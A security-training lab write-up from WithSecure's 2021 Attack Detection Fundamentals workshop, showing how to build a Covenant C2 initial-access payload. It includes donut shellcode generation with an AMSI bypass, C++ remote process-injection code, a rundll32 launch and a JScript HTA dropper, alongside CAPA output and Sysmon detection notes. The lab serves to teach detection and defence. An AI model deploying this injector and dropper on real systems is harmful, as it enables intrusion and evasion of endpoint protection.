{"id":7736,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7736"},"modified":"2026-05-22T12:53:32","modified_gmt":"2026-05-22T11:53:32","slug":"attack-detection-fundamentals-2021-windows-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive 
security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 April, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: 
Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_6469fafc2e230f141b5765bd1f65c225\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                
<\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n   
                         <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" 
target=\"_blank\" rel=\"noreferrer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints. This included the offensive and defensive use of API hooking, as well as the theft of cookies to enable &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>One of the core concepts of the first workshop was &quot;Defense Evasion&quot; geared towards &quot;Initial Access&quot;. In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms as they behaved at the time of writing (April 2021); detection coverage for the techniques below has likely moved on since, so treat each evasion as a case study rather than a guarantee. 
More specifically, the outcome of this workshop will be the creation of an HTA file that will do the following:<\/p>\n<ul>\n<li>Drop a DLL on disk and load it via registration-free COM activation<\/li>\n<li>The DLL will spawn a new process and inject an AMSI-bypassing shellcode into it<\/li>\n<\/ul>\n<p>Given this will be quite a detailed walkthrough, we&#x27;ve split it into two parts, where we&#x27;ll improve our initial payload in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">next lab<\/a> to include two further defense evasion techniques: API unhooking and ETW bypasses.<\/p>\n<p>For each attacker step, we will analyse the various detection opportunities that either security products or SOC analysts could employ, alongside the most common attacker opsec pitfalls.<\/p>\n<p>Despite the final outcome appearing quite complex, we will try to break it down into its fundamental steps to make it more accessible.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM, isolated from any production network since the payloads built here are live C2 implants (ideally running <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a>; SwiftOnSecurity&#x27;s <a href=\"https:\/\/raw.githubusercontent.com\/SwiftOnSecurity\/sysmon-config\/master\/sysmonconfig-export.xml\" target=\"_blank\" rel=\"noopener\">config<\/a> will do)<\/li>\n<li>1x Kali VM (Optional)<\/li>\n<li><a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a> (we&#x27;re using the dev branch)<\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/TheWover\/donut\/\" target=\"_blank\" rel=\"noopener\">Donut<\/a><\/li>\n<li>FireEye&#x27;s CAPA<\/li>\n<li><a href=\"https:\/\/frida.re\/docs\/installation\/\" target=\"_blank\" rel=\"noopener\">Frida for Windows<\/a><\/li>\n<\/ul>\n<p>DISCLAIMER: Set up of the tools and the testing environment is not covered 
comprehensively within this lab. We will assume basic familiarity with the Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>Setup<\/h3>\n<p>The first step will be to configure our Command and Control server to accept connections from the implants. We will use the open source Covenant C2 framework for this. We will skip the installation steps, as they are well covered in the official Covenant Wiki.<\/p>\n<p>Let&#x27;s create a new HTTP listener from the main dashboard:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323174807172.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>RED TEAM ALERT: In this case we will create a listener that accepts remote connections on a raw IP address, over plaintext HTTP, and with the default communication profile. All of those values should be changed during a real operation, both to maximise the chances of obtaining a callback and to avoid producing trivially fingerprintable traffic.<\/p>\n<p>BLUE TEAM ALERT: Frameworks are often used in their default configuration by attackers. Default values leave traces that can be used to spot malicious activity; network communication is one example. By default, Covenant and other C2 frameworks such as Cobalt Strike have a predefined way of communicating back to their C2 server. By either analysing the traffic with Wireshark or reading the source code, would you be able to spot (and even alert on) the HTTP endpoints used by Covenant?<\/p>\n<p>Now that we have a listener set up, we need what Covenant calls a &quot;Launcher&quot;. A Launcher is just a payload that will spawn a &quot;Grunt&quot;, Covenant&#x27;s terminology for an implant. 
We can create launchers in various formats such as EXEs and DLLs; however, here we will create a &quot;ShellCode&quot; launcher.<\/p>\n<p>As discussed in the workshop, using shellcode will give us greater flexibility and stealth when building our initial access payload. So let&#x27;s create a &#x27;.bin&#x27; file from Covenant&#x27;s Launcher dashboard and save it on disk.<\/p>\n<p>NOTE: If you save the &#x27;.bin&#x27; file on a Windows endpoint with an antivirus enabled, it might get deleted.<\/p>\n<p>We will not create our shellcode injector just yet; instead we will rely on hasherezade&#x27;s <a href=\"https:\/\/github.com\/hasherezade\/masm_shc\" target=\"_blank\" rel=\"noopener\">masm_shc<\/a> project. After downloading the binaries, run the &#x27;run_shc64.exe&#x27; binary with the path of the &#x27;.bin&#x27; file as the only command line argument.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/drum-1f941.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Well, you might or might not have obtained a Grunt callback on your system. You might be wondering why. Let&#x27;s start by checking Windows Defender&#x27;s Event Logs:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323175027915.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>During the production of this content, we observed that the shellcode launcher in Covenant failed to properly disable AMSI. Therefore, depending on the .NET version installed on your system (and when you complete this lab), an AMSI event might have been generated. 
This is because, from .NET Framework 4.8 onwards, AMSI supports scanning .NET assemblies that are reflectively loaded using <a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.reflection.assembly.load?view=net-5.0\" target=\"_blank\" rel=\"noopener\">&#x27;Assembly.Load()&#x27;<\/a>.<\/p>\n<p>This is something that Covenant abstracted away for us, but the shellcode it generated was loading the Common Language Runtime (CLR) and reflectively loading the Grunt .NET assembly. All of this was done using the donut tool. It makes sense that AMSI blocked our attack, since Defender was able to scan the raw bytes of the Covenant grunt even though all of this was happening in memory.<\/p>\n<p>Luckily, an easy fix for this is to run the latest Donut manually, with its default options. In fact, donut already implements an AMSI bypass in pure C\/ASM, meaning that .NET introspection would not affect it.<\/p>\n<p>Let&#x27;s try again by generating an EXE by choosing &quot;Binary Launcher&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323174839716.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>All we need to do now is to execute donut with the default options against the newly generated binary, as shown below:<\/p>\n<pre><code class=\"language-bash\">PS C:\\Users\\Developer\\Desktop\\workshop&gt; C:\\Users\\Developer\\Desktop\\Tools\\donut\\donut.exe -f Z:\\Downloads\\f445fc2af7.exe\n\n[ Donut shellcode generator v0.9.2\n[ Copyright (c) 2019 TheWover, Odzhan\n\n[ Instance type : PIC\n[ Module file : &quot;Z:\\Downloads\\f445fc2af7.exe&quot;\n[ File type : .NET EXE\n[ Target CPU : x86+AMD64\n[ AMSI\/WDLP : continue\n[ Shellcode : &quot;payload.bin&quot;<\/code><\/pre>\n<p>If all went fine, you should now have a Covenant shellcode able to bypass AMSI (at least with the Defender build we tested against; the bypass is a moving target and should be re-verified against current signatures):<\/p>\n<figure><img decoding=\"async\" 
src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323175132095.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Shellcode on its own is not very useful, as it cannot be executed without an additional component that injects it into another process or into itself. Let&#x27;s proceed with the creation of a basic DLL implant.<\/p>\n<h2>Weaponisation<\/h2>\n<p>The shellcode injector we will create will be written in C++. We will use Visual Studio for this, but any other code editor and compiler that supports C++ on Windows will be sufficient.<\/p>\n<p>Open Visual Studio and do the following:<\/p>\n<ul>\n<li>Create New Project<\/li>\n<li>Select the &quot;Dynamic-Link Library (DLL)&quot; C++ template<\/li>\n<li>Select the folder where to store our code<\/li>\n<\/ul>\n<p>This will create an empty C++ project with a basic code skeleton of a DLL; let&#x27;s start discussing the code.<\/p>\n<p>First of all, at a conceptual level, process injection can be divided into four phases:<\/p>\n<ul>\n<li>Creation or selection of a target process (can be another process or the same process injecting into itself)<\/li>\n<li>Allocation of memory<\/li>\n<li>Writing the shellcode into the allocated memory<\/li>\n<li>Triggering the execution<\/li>\n<\/ul>\n<p>These four fundamental steps can be implemented in different ways, creating many flavours of process injection techniques. 
It must also be noted that some more advanced techniques are able to avoid one or more of the aforementioned steps, for example avoiding allocating new memory by overwriting existing memory pages (process hollowing is an example of that).<\/p>\n<p>However, we want to keep this relatively simple and therefore we will use the following:<\/p>\n<ul>\n<li>We will create a new process, &#x27;notepad.exe&#x27; initially, in a suspended state<\/li>\n<li>We will allocate memory into the remote process using the &#x27;VirtualAllocEx&#x27; function<\/li>\n<li>The shellcode will be copied using &#x27;WriteProcessMemory&#x27;<\/li>\n<li>Execution will be triggered using &#x27;CreateRemoteThread&#x27;<\/li>\n<\/ul>\n<p>The snippet that can be used to accomplish the above is the following. To keep the example short, none of the return values are checked (and &#x27;si&#x27; is a &#x27;STARTUPINFOEXW&#x27; zeroed with the size of the &#x27;STARTUPINFOEXA&#x27; variant, which is inconsistent but harmless as the two structures have the same size); a real implant should verify that each call succeeded before moving on to the next step. Note also that the RWX allocation and the remote thread creation are exactly the behaviours that CAPA and Sysmon flag later in this lab:<\/p>\n<pre><code class=\"language-bash\">PROCESS_INFORMATION pi;\nSTARTUPINFOEXW si;\nSIZE_T attributeSize;\nLPVOID allocatedMemory = NULL;\nWCHAR path[MAX_PATH];\nSIZE_T written = 0;\n\nZeroMemory(&amp;si, sizeof(STARTUPINFOEXA));\nZeroMemory(&amp;pi, sizeof(PROCESS_INFORMATION));\n\nstatic unsigned char shellcode[] = {SHELLCODE};\n\nlstrcpyW(path, L&quot;C:\\\\windows\\\\SYSWOW64\\\\notepad.exe&quot;);\n\nCreateProcess(NULL, path, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &amp;si, &amp;pi);\nSleep(1000);\n\nallocatedMemory = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n\nWriteProcessMemory(pi.hProcess, allocatedMemory, shellcode, sizeof(shellcode), &amp;written);\n\nCreateRemoteThread(pi.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)allocatedMemory, NULL, NULL, NULL);\n\nResumeThread(pi.hThread);<\/code><\/pre>\n<p>The variable &#x27;shellcode&#x27; should be filled with the bytes of the shellcode that was previously generated. 
This can be achieved in many ways, but a simple &#x27;hexdump&#x27; command will be sufficient:<\/p>\n<pre><code class=\"language-bash\">hexdump -v -e &#x27;&quot;, &quot;&quot;&quot; 1\/1 &quot;%02x&quot; &quot;&quot;&#x27; payload.bin<\/code><\/pre>\n<p>Compiling it in &quot;Release&quot; mode for x86 will give you a 32-bit DLL, matching the 32-bit &#x27;notepad.exe&#x27; under SysWOW64 that the injector targets (the DLL and the target process must agree on architecture). Assuming the injection routine lives in an exported function named &#x27;test&#x27;, it can be executed as follows:<\/p>\n<pre><code class=\"language-bash\">rundll32 simple.dll,test<\/code><\/pre>\n<p>You should obtain an active Grunt session running on your testing VM, if everything went fine. This will be our shellcode injector that will be dropped on disk and loaded by the HTA we will craft shortly&#8230; Yes, we said &quot;drop on disk&quot;.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323203451900.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Some people might have different opinions, but a well-crafted payload can be dropped on disk safely in certain situations. File write operations are so common that it&#x27;s extremely hard for security products to alert on that alone. Bear in mind, however, that a file on disk is also an artefact that can be scanned statically and recovered during an investigation, which is exactly what we do next.<\/p>\n<p>Now let&#x27;s step back from the offensive side and wear our blue hat for a bit. 
We will analyse the generated payload and try to understand if it&#x27;s malicious and at a high level what the sample does (spoiler, it&#x27;s malicious).<\/p>\n<p>Let&#x27;s start by executing FireEye&#x27;s CAPA against it:<\/p>\n<pre><code class=\"language-bash\">.\/capa simple-inject.dll\nloading : 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 341\/341 [00:01&lt;00:00, 185.59 rules\/s]\nmatching: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 66\/66 [00:00&lt;00:00, 84.75 functions\/s]\n+------------------------+------------------------------------------------------------------------------------+\n| md5 | f6c34fffec97dca0d47e8943812d07ac |\n| sha1 | 654ccfe60f23cf0ae11d154d4e2f8f9ad18a57b6 |\n| sha256 | 0b5dd9946ab7d50a344bf1b1be706667422b8f3b2bce11a98daf8f38af7e1007 |\n| path | simple-inject.dll |\n+------------------------+------------------------------------------------------------------------------------+\n\n+------------------------+------------------------------------------------------------------------------------+\n| ATT&amp;CK Tactic | ATT&amp;CK Technique |\n|------------------------+------------------------------------------------------------------------------------|\n| DEFENSE EVASION | Process Injection [T1055] |\n| | Virtualization\/Sandbox Evasion::System Checks [T1497.001] |\n| DISCOVERY | Process Discovery [T1057] |\n| EXECUTION | Shared Modules [T1129] |\n+------------------------+------------------------------------------------------------------------------------+\n\n+------------------------------------------------------+------------------------------------------------------+\n| CAPABILITY | NAMESPACE |\n|------------------------------------------------------+------------------------------------------------------|\n| execute anti-VM 
instructions (2 matches) | anti-analysis\/anti-vm\/vm-detection |\n| contains PDB path | executable\/pe\/pdb |\n| contain a resource (.rsrc) section | executable\/pe\/section\/rsrc |\n| print debug messages | host-interaction\/log\/debug\/write-event |\n| create process | host-interaction\/process\/create |\n| create process suspended | host-interaction\/process\/create |\n| allocate RWX memory | host-interaction\/process\/inject |\n| inject thread | host-interaction\/process\/inject |\n| enumerate processes | host-interaction\/process\/list |\n| terminate process | host-interaction\/process\/terminate |\n| parse PE header | load-code\/pe |\n+------------------------------------------------------+------------------------------------------------------+<\/code><\/pre>\n<p>As we can see, multiple signs of code injection capabilities are present, such as &quot;inject thread&quot; and &quot;allocate RWX memory&quot;:<\/p>\n<pre><code class=\"language-bash\">allocate RWX memory\nnamespace host-interaction\/process\/inject\nauthor moritz.raabe@fireeye.com\nscope basic block\natt&amp;ck Defense Evasion::Process Injection [T1055]\nexamples Practical Malware Analysis Lab 03-03.exe_:0x4010EA, 563653399B82CD443F120ECEFF836EA3678D4CF11D9B351BB737573C2D856299:0x140001ABA\nbasic block @ 0x1000114B\nand:\nor:\napi: kernel32.VirtualAllocEx @ 0x10001213\nor:\nnumber: 0x40 = PAGE_EXECUTE_READWRITE @ 0x10001201\n\ninject thread\nnamespace host-interaction\/process\/inject\nauthor anamaria.martinezgom@fireeye.com\nscope function\natt&amp;ck Defense Evasion::Process Injection [T1055]\nexamples Practical Malware Analysis Lab 12-01.exe_:0x4010D0, 2D3EDC218A90F03089CC01715A9F047F:0x4027CF\nfunction @ 0x10001070\nand:\nor:\napi: kernel32.VirtualAllocEx @ 0x10001213\nmatch: write process memory @ 0x10001070\nor:\napi: kernel32.WriteProcessMemory @ 0x1000125A\nor:\napi: kernel32.CreateRemoteThread @ 0x10001297\noptional:\nor:\napi: kernel32.OpenProcess @ 0x10001153\nnumber: 0x40 = 
PAGE_EXECUTE_READWRITE @ 0x10001201\nnumber: 0x3000 = MEM_COMMIT or MEM_RESERVE @ 0x10001203<\/code><\/pre>\n<p>We know what the sample does, since we wrote it, but we could go as far as reversing the DLL using <a href=\"https:\/\/www.hex-rays.com\/products\/ida\/\" target=\"_blank\" rel=\"noopener\">IDA<\/a> or <a href=\"https:\/\/ghidra-sre.org\/\" target=\"_blank\" rel=\"noopener\">Ghidra<\/a> and extract the malicious shellcode from it. Other triage tools such as <a href=\"https:\/\/www.winitor.com\/\" target=\"_blank\" rel=\"noopener\">PE Studio<\/a> would yield similar results.<\/p>\n<p>In a nutshell, our injector is not opsec safe for a number of reasons:<\/p>\n<ul>\n<li>It does not have any execution guardrail or sandbox check<\/li>\n<li>It has a lot of suspicious imports (a static import table that resolves &#x27;VirtualAllocEx&#x27;, &#x27;WriteProcessMemory&#x27; and &#x27;CreateRemoteThread&#x27;, as the CAPA output shows)<\/li>\n<li>It embeds a PDB path (also flagged by CAPA), which leaks details of the build environment<\/li>\n<li>It does not have any anti-emulation logic<\/li>\n<li>It does not implement PPID spoofing or apply any process mitigation policy to harden the remote process<\/li>\n<li>It creates an unusual process (a windowless &#x27;notepad.exe&#x27;) in a suspended state<\/li>\n<\/ul>\n<p>Additionally, the injection technique we chose is extremely noisy, as it will not just trigger any userland hooks that might be in place (more on this later) but also kernel callbacks registered by drivers such as Sysmon. The screenshot below is an example of Sysmon Event ID 8, which indicates that a thread was created in a remote process:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323205122099.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>HTA to The Masses<\/h2>\n<p>Our DLL is not perfect, but it works. However, it&#x27;s quite hard to deliver one to a target user since no default action is associated with that file type (double clicking it doesn&#x27;t do much!). Not to mention that most corporate web proxies and mail filters block the DLL file type regardless of whether it is malicious or benign! 
What is needed is an additional component that will write our DLL on disk and then load it to trigger the execution. HTAs were chosen for this task, but the same concept could be applied with other languages such as VBS and VBA, commonly used for initial access as well.<\/p>\n<p>The first bit of our HTA will actually write our DLL on disk. In fact, we can embed our DLL in a base64 string within the HTA itself and decode it in memory. Including our DLL file in this way is often referred to as a &#x27;dropper&#x27;, where the file is embedded within our initial access payload, as opposed to a downloader, where our HTA would fetch the DLL from an external location. Obtaining the base64 of our DLL is as easy as &#x27;cat simple.dll | base64 -w 0&#x27; and then using the following template:<\/p>\n<pre><code class=\"language-bash\">var shell = new ActiveXObject(&#x27;WScript.Shell&#x27;);\nvar path = shell.ExpandEnvironmentStrings(&quot;%APPDATA%&quot;) + &quot;\\\\&quot;\n\nvar filename = &quot;test.dll&quot;;\n\nvar forReading = 1, forWriting = 2, forAppending = 8;\nvar create = true; \/\/ if file doesn&#x27;t exist, then create it\n\nvar xmlDom = new ActiveXObject(&quot;Microsoft.XMLDOM&quot;);\nvar el = xmlDom.createElement(&quot;tmp&quot;);\nel.dataType = &quot;bin.Base64&quot;\nel.text = &quot;BASE64&quot;; \/\/ the base64 goes here\n\n\/\/ Use a binary stream to write the bytes into\nvar strm = new ActiveXObject(&quot;ADODB.Stream&quot;);\nstrm.Type = 1;\nstrm.Open();\nstrm.Write(el.nodeTypedValue);\n\nstrm.SaveToFile(path + filename, 2);\nstrm.Close();<\/code><\/pre>\n<p>BLUE TEAM ALERT: Having the right telemetry will create multiple detection opportunities for this technique so far. 
